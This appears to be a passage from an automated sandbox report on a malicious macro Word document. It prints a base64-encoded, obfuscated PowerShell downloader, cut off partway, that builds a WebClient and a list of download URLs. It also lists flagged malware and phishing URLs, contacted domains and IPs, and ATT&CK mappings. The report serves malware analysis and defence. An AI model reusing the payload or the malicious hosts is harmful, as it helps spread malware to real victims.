QgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection11Masquerading1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsCommand and Scripting Interpreter111Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsScripting12Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information2LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting12Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncSystem Information Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
v22Pc0qA.doc.doc47%MetadefenderBrowse
v22Pc0qA.doc.doc86%ReversingLabsScript-Macro.Trojan.Valyria

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://b2bcom.com.br/portfolio/acm-2/0%Avira URL Cloudsafe
https://b2bcom.com.br/blog/empreender-e-sonhar/0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2019/02/slideshow3.jpg0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2020/04/1.png0%Avira URL Cloudsafe
http://hotelshivansh.com/UserFiles/8/100%Avira URL Cloudmalware
https://b2bcom.com.br/portfolio/acrilico-com-iluminacao/0%Avira URL Cloudsafe
https://www.isatechnology.com/training/b/100%Avira URL Cloudmalware
https://b2bcom.com.br/portfolio/web-site-www-btenergia-com-br/0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2019/09/icone_id-120x120.png0%Avira URL Cloudsafe
https://b2bcom.com.br/portfolio/web-site-www-weissarquitetura-com/0%Avira URL Cloudsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
https://b2bcom.com.br/blog0%Avira URL Cloudsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
https://b2bcom.com.br/#about0%Avira URL Cloudsafe
http://transfersuvan.com/wp-admin/OVl/100%Avira URL Cloudmalware
https://b2bcom.com.br/portfolio/www-btenergia-com-br/0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2019/03/The-Stockton-Cafe-4-320x200.png0%Avira URL Cloudsafe
https://b2bcom.com.br/#blog0%Avira URL Cloudsafe
https://b2bcom.com.br/portfolio/acm/0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2019/10/Screenshot_2.jpg0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2019/03/CAIXA-2-120x120.png0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2020/03/METRO-450x400.jpg0%Avira URL Cloudsafe
https://b2bcom.com.br/#contact0%Avira URL Cloudsafe
https://b2bcom.com.br/portfolio/site-institucional-www-ximpressoes-com-br/0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2019/03/logo-site.png0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-json/0%Avira URL Cloudsafe
https://physio-svdh.ch/wp-admin/kK/P100%Avira URL Cloudmalware
http://arquivopop.com.br0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2019/09/2-1.png0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2020/04/3.png0%Avira URL Cloudsafe
https://b2bcom.com.br/site/0H/100%Avira URL Cloudphishing
https://b2bcom.com.br/wp-content/themes/b2bcom/assets/css/main.css0%Avira URL Cloudsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2019/04/ARQUITETURA-100x100.png0%Avira URL Cloudsafe
http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
https://b2bcom.com.br/wp-content/uploads/2020/03/quadro-led-luminoso-cerveja-redondo-duff-beer-44cm-0%Avira URL Cloudsafe
http://cps.letsencrypt.org00%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
https://b2bcom.com.br/wp-content/uploads/2019/02/WEB-1-100x100.png0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2020/12/ACR0%Avira URL Cloudsafe
https://b2bcom.com.br/#services0%Avira URL Cloudsafe
https://b2bcom.com.br/servicos/limpeza-de-fachadas/0%Avira URL Cloudsafe
https://b2bcom.com.br/portfolio/projeto-persolalizado/0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2020/11/mockDrop_iMac-on-a-table-2-450x400.jpg0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2019/09/6.png0%Avira URL Cloudsafe
https://b2bcom.com.br/#home0%Avira URL Cloudsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
https://b2bcom.com.br/portfolio/acrilico/0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2019/02/ARTE_FOTO-120x120.png0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2020/12/10.png0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2019/03/4.png0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2020/11/3.png0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2020/11/o-que-e-e-commerce.jpg0%Avira URL Cloudsafe
https://physio-svdh.ch/wp-admin/kK/100%Avira URL Cloudmalware
https://b2bcom.com.br/wp-content/uploads/2019/08/mockDrop_iMac-on-a-table-1-450x400.jpg0%Avira URL Cloudsafe
https://b2bcom.com.br/portfolio/letra-caixa/0%Avira URL Cloudsafe
https://b2bcom.com.br/portfolio/site-institucional-www-metronetwork-com-br/0%Avira URL Cloudsafe
https://physio-svdh.ch0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2020/06/fachada_02_site.png0%Avira URL Cloudsafe
https://b2bcom.com.br/blog/novo-normal-o-papel-do-e-commerce-para-as-novas-empresas/0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/themes/b2bcom/assets/img/favicon.webp0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2020/12/Subway-sec-450x300.jpg0%Avira URL Cloudsafe
https://b2bcom.com.br/portfolio/displays-luminosos/0%Avira URL Cloudsafe
https://cairocad.com0%Avira URL Cloudsafe
https://b2bcom.com.br/portfolio/web-site-www-cemundodosaber-com-br/0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2020/04/2.png0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2019/12/ICONE_VALORES.png0%Avira URL Cloudsafe
http://hotelshivansh.com0%Avira URL Cloudsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://arquivopop.com.br/index_htm_files/Kxh/100%Avira URL Cloudmalware
https://b2bcom.com.br/wp-content/uploads/2019/12/ICONE_MISSAO.png0%Avira URL Cloudsafe
http://transfersuvan.com0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2019/09/icone_id-100x100.png0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-conte0%Avira URL Cloudsafe
https://b2bcom.com.br/portfolio/design/0%Avira URL Cloudsafe
https://b2bcom.com.br/servicos/branding-de-marca/0%Avira URL Cloudsafe
https://www.isatechnology.comp0%Avira URL Cloudsafe
https://b2bcom.com.br/portfolio/trabalho-8-2/0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2019/08/4.png0%Avira URL Cloudsafe
https://cairocad.com/cgi-bin/1PBB/100%Avira URL Cloudmalware
http://ownitconsignment.com0%Avira URL Cloudsafe
https://b2bcom.com.br0%Avira URL Cloudsafe
https://cairocad.comp0%Avira URL Cloudsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
https://b2bcom.com.br/blog/sinalizacao-seu-cartao-de-visita/0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2019/03/CAIXA-2-100x100.png0%Avira URL Cloudsafe
https://b2bcom.com.br/wp-content/uploads/2019/08/logo-site-2.png0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
isatechnology.com
35.208.182.43
truetrue
    unknown
    physio-svdh.ch
    194.209.195.106
    truetrue
      unknown
      transfersuvan.com
      0.0.0.0
      truetrue
        unknown
        ownitconsignment.com
        70.32.23.44
        truetrue
          unknown
          hotelshivansh.com
          103.205.64.138
          truetrue
            unknown
            b2bcom.com.br
            177.12.163.108
            truetrue
              unknown
              cairocad.com
              35.208.153.170
              truetrue
                unknown
                arquivopop.com.br
                unknown
                unknowntrue
                  unknown
                  www.isatechnology.com
                  unknown
                  unknowntrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://hotelshivansh.com/UserFiles/8/true
                    • Avira URL Cloud: malware
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://b2bcom.com.br/portfolio/acm-2/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://b2bcom.com.br/blog/empreender-e-sonhar/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.youtube.com/channel/UCrYEOm4ym22murrhb0WGC2Apowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      high
                      https://b2bcom.com.br/wp-content/uploads/2019/02/slideshow3.jpgpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://b2bcom.com.br/wp-content/uploads/2020/04/1.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://b2bcom.com.br/portfolio/acrilico-com-iluminacao/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.isatechnology.com/training/b/powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://b2bcom.com.br/portfolio/web-site-www-btenergia-com-br/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://b2bcom.com.br/wp-content/uploads/2019/09/icone_id-120x120.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://b2bcom.com.br/portfolio/web-site-www-weissarquitetura-com/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://b2bcom.com.br/blogpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://b2bcom.com.br/#aboutpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://transfersuvan.com/wp-admin/OVl/powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://b2bcom.com.br/portfolio/www-btenergia-com-br/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://b2bcom.com.br/wp-content/uploads/2019/03/The-Stockton-Cafe-4-320x200.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://b2bcom.com.br/#blogpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://b2bcom.com.br/portfolio/acm/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://b2bcom.com.br/wp-content/uploads/2019/10/Screenshot_2.jpgpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://b2bcom.com.br/wp-content/uploads/2019/03/CAIXA-2-120x120.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://b2bcom.com.br/wp-content/uploads/2020/03/METRO-450x400.jpgpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://b2bcom.com.br/#contactpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://b2bcom.com.br/portfolio/site-institucional-www-ximpressoes-com-br/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://b2bcom.com.br/wp-content/uploads/2019/03/logo-site.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://b2bcom.com.br/wp-json/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://physio-svdh.ch/wp-admin/kK/Ppowershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://arquivopop.com.brpowershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://b2bcom.com.br/wp-content/uploads/2019/09/2-1.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://b2bcom.com.br/wp-content/uploads/2020/04/3.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://b2bcom.com.br/site/0H/powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: phishing
                      unknown
                      https://b2bcom.com.br/wp-content/themes/b2bcom/assets/css/main.csspowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://servername/isapibackend.dllpowershell.exe, 00000004.00000002.2120136620.000000001D2B0000.00000002.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      https://b2bcom.com.br/wp-content/uploads/2019/04/ARQUITETURA-100x100.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://cps.root-x1.letsencrypt.org0powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.windows.com/pctv.powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmpfalse
                        high
                        https://b2bcom.com.br/wp-content/uploads/2020/03/quadro-led-luminoso-cerveja-redondo-duff-beer-44cm-powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://cps.letsencrypt.org0powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://b2bcom.com.br/wp-content/uploads/2019/02/WEB-1-100x100.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://b2bcom.com.br/wp-content/uploads/2020/12/ACRpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://b2bcom.com.br/#servicespowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://b2bcom.com.br/servicos/limpeza-de-fachadas/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://b2bcom.com.br/portfolio/projeto-persolalizado/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.piriform.com/ccleanepowershell.exe, 00000004.00000002.2110680458.00000000001E7000.00000004.00000020.sdmpfalse
                          high
                          https://b2bcom.com.br/wp-content/uploads/2020/11/mockDrop_iMac-on-a-table-2-450x400.jpgpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://b2bcom.com.br/wp-content/uploads/2019/09/6.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://b2bcom.com.br/#homepowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://b2bcom.com.br/portfolio/acrilico/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://b2bcom.com.br/wp-content/uploads/2019/02/ARTE_FOTO-120x120.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://b2bcom.com.br/wp-content/uploads/2020/12/10.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://b2bcom.com.br/wp-content/uploads/2019/03/4.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://b2bcom.com.br/wp-content/uploads/2020/11/3.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://b2bcom.com.br/wp-content/uploads/2020/11/o-que-e-e-commerce.jpgpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://physio-svdh.ch/wp-admin/kK/powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000004.00000002.2112079841.00000000023F0000.00000002.00000001.sdmpfalse
                            high
                            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000004.00000002.2110680458.00000000001E7000.00000004.00000020.sdmpfalse
                              high
                              https://b2bcom.com.br/wp-content/uploads/2019/08/mockDrop_iMac-on-a-table-1-450x400.jpgpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://b2bcom.com.br/portfolio/letra-caixa/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://b2bcom.com.br/portfolio/site-institucional-www-metronetwork-com-br/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://physio-svdh.chpowershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117416892.0000000003C20000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              https://b2bcom.com.br/wp-content/uploads/2020/06/fachada_02_site.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://b2bcom.com.br/blog/novo-normal-o-papel-do-e-commerce-para-as-novas-empresas/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://b2bcom.com.br/wp-content/themes/b2bcom/assets/img/favicon.webppowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://b2bcom.com.br/wp-content/uploads/2020/12/Subway-sec-450x300.jpgpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://crl.entrust.net/2048ca.crl0powershell.exe, 00000004.00000003.2110391188.000000001B636000.00000004.00000001.sdmpfalse
                                high
